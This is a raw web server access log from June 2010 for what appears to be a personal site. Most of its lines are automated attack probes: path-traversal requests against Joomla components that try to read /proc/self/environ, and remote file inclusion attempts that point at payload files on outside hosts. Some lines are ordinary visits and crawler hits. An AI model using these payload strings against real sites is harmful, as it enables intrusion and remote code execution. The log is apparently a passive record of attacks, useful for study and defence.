74.55.65.134 - - [09/Jun/2010:20:21:57 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:20:21:57 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
60.234.132.61 - - [09/Jun/2010:20:22:09 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
60.234.132.61 - - [09/Jun/2010:20:22:12 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
61.110.10.185 - - [09/Jun/2010:20:22:33 -0500] "GET //linkadmin.php?page=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.110.10.185 - - [09/Jun/2010:20:22:33 -0500] "GET /logs/access_log.1271462400//linkadmin.php?page=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
61.110.10.185 - - [09/Jun/2010:20:22:33 -0500] "GET /logs//linkadmin.php?page=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.227.215.115 - - [09/Jun/2010:20:22:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:22:51 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:22:51 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
189.126.195.70 - - [09/Jun/2010:20:24:29 -0500] "GET /logs/access_log.1271376000//linkadmin.php?page=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:20:24:29 -0500] "GET /logs//linkadmin.php?page=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:20:24:29 -0500] "GET //linkadmin.php?page=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:20:24:29 -0500] "GET /logs/access_log.1272067200//linkadmin.php?page=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:20:25:06 -0500] "GET /logs/access_log.1271376000//linkadmin.php?page=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:20:25:06 -0500] "GET /logs//linkadmin.php?page=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:20:25:06 -0500] "GET /logs/access_log.1272067200//linkadmin.php?page=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:20:25:06 -0500] "GET //linkadmin.php?page=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.227.215.115 - - [09/Jun/2010:20:26:00 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:26:00 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:26:00 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:26:12 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:26:12 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:20:26:13 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
60.234.132.61 - - [09/Jun/2010:20:29:26 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
60.234.132.61 - - [09/Jun/2010:20:29:37 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.46.13.96 - - [09/Jun/2010:20:31:38 -0500] "GET /logs/access_log.1175126400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
60.234.132.61 - - [09/Jun/2010:20:33:29 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
60.234.132.61 - - [09/Jun/2010:20:35:32 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
218.150.85.170 - - [09/Jun/2010:20:38:11 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.825"
207.57.250.92 - - [09/Jun/2010:20:43:12 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
207.57.250.92 - - [09/Jun/2010:20:43:13 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
118.129.166.213 - - [09/Jun/2010:20:46:27 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:20:46:34 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:20:47:15 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:20:47:17 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
81.208.34.38 - - [09/Jun/2010:20:47:28 -0500] "GET /logs/access_log.1274572800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [09/Jun/2010:20:48:16 -0500] "GET /costume/ HTTP/1.0" 200 - "http://www.ringsworld.com/history/6-previous.html""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [09/Jun/2010:20:48:18 -0500] "GET /logs/access_log.1223856000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.85.170 - - [09/Jun/2010:20:49:44 -0500] "GET /logs/access_log.1274832000//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.825"
218.150.85.170 - - [09/Jun/2010:20:49:47 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.825"
218.150.85.170 - - [09/Jun/2010:20:49:51 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.825"
218.150.85.170 - - [09/Jun/2010:20:50:24 -0500] "GET /logs/access_log.1274572800//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.825"
118.129.166.213 - - [09/Jun/2010:20:50:27 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:20:50:28 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:20:52:33 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
209.216.242.123 - - [09/Jun/2010:20:53:40 -0500] "GET /index_principal.php?pagina=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
209.216.242.123 - - [09/Jun/2010:20:53:40 -0500] "GET /logs/index_principal.php?pagina=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.216.242.123 - - [09/Jun/2010:20:53:40 -0500] "GET /logs/access_log.1270857600/index_principal.php?pagina=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.216.242.123 - - [09/Jun/2010:20:53:40 -0500] "GET /logs/access_log.1271116800/index_principal.php?pagina=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.46.13.47 - - [09/Jun/2010:20:56:09 -0500] "GET /logs/access_log.1159574400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.92 - - [09/Jun/2010:20:56:39 -0500] "GET /logs/access_log.1213142400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [09/Jun/2010:20:58:11 -0500] "GET /logs/access_log.1222560000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.134 - - [09/Jun/2010:20:59:42 -0500] "GET /logs/access_log.1219795200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.166.213 - - [09/Jun/2010:20:59:56 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:20:59:58 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:21:01:06 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:21:01:11 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
217.73.239.8 - - [09/Jun/2010:21:04:07 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.807"
217.73.239.8 - - [09/Jun/2010:21:04:07 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
216.227.215.115 - - [09/Jun/2010:21:04:09 -0500] "GET /logs/access_log.1274313600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:21:04:09 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [09/Jun/2010:21:04:09 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
69.73.180.30 - - [09/Jun/2010:21:04:09 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
217.73.239.8 - - [09/Jun/2010:21:04:12 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.807"
217.73.239.8 - - [09/Jun/2010:21:04:12 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [09/Jun/2010:21:05:08 -0500] "GET /logs/*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [09/Jun/2010:21:05:08 -0500] "GET /*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
89.145.108.230 - - [09/Jun/2010:21:05:38 -0500] "GET /logs/*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [09/Jun/2010:21:05:38 -0500] "GET /*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
24.56.61.29 - - [09/Jun/2010:21:05:45 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=12&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26um%3D1%26hl%3Den%26safe%3Doff%26rlz%3D1R2WZPC_enUS354%26tbs%3Disch:1,ic:color""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:05:45 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:05:45 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:05:46 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:05:46 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:05:46 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:05:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
217.73.239.8 - - [09/Jun/2010:21:05:51 -0500] "GET /logs/*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [09/Jun/2010:21:05:51 -0500] "GET /*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
24.56.61.29 - - [09/Jun/2010:21:06:03 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:06:03 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:06:03 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:06:03 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:06:03 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:06:03 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:06:03 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:06:03 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
24.56.61.29 - - [09/Jun/2010:21:06:03 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTB5.6)"
118.129.166.213 - - [09/Jun/2010:21:06:41 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
207.57.250.92 - - [09/Jun/2010:21:07:07 -0500] "GET /logs/access_log.1274572800/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
207.57.250.92 - - [09/Jun/2010:21:07:07 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
207.57.250.92 - - [09/Jun/2010:21:07:08 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
121.88.4.141 - - [09/Jun/2010:21:07:42 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.88.4.141 - - [09/Jun/2010:21:07:46 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.88.4.141 - - [09/Jun/2010:21:07:46 -0500] "GET /logs/access_log.1271548800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.57.250.92 - - [09/Jun/2010:21:08:00 -0500] "GET /logs/access_log.1274572800/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
207.57.250.92 - - [09/Jun/2010:21:08:00 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
207.57.250.92 - - [09/Jun/2010:21:08:00 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
207.57.250.92 - - [09/Jun/2010:21:08:10 -0500] "GET /logs/access_log.1273363200/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
121.88.4.141 - - [09/Jun/2010:21:08:51 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.88.4.141 - - [09/Jun/2010:21:08:51 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.88.4.141 - - [09/Jun/2010:21:08:56 -0500] "GET /logs/access_log.1271548800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.57.250.92 - - [09/Jun/2010:21:08:59 -0500] "GET /logs/access_log.1273363200/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
67.195.112.180 - - [09/Jun/2010:21:10:40 -0500] "GET /logs/access_log.1212019200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.36.230.60 - - [09/Jun/2010:21:11:09 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.64"
66.36.230.60 - - [09/Jun/2010:21:11:09 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.64"
118.129.166.213 - - [09/Jun/2010:21:11:24 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:21:11:26 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
212.61.10.131 - - [09/Jun/2010:21:11:36 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.61.10.131 - - [09/Jun/2010:21:11:36 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.93.240.122 - - [09/Jun/2010:21:12:00 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.93.240.122 - - [09/Jun/2010:21:12:00 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.122 - - [09/Jun/2010:21:12:00 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.25.25 - - [09/Jun/2010:21:12:07 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.25.25 - - [09/Jun/2010:21:12:07 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
173.201.20.200 - - [09/Jun/2010:21:12:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
173.201.20.200 - - [09/Jun/2010:21:12:09 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
173.201.20.200 - - [09/Jun/2010:21:12:09 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
207.46.199.178 - - [09/Jun/2010:21:12:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.161.235.24 - - [09/Jun/2010:21:12:16 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
83.161.235.24 - - [09/Jun/2010:21:12:16 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
118.129.166.213 - - [09/Jun/2010:21:13:05 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
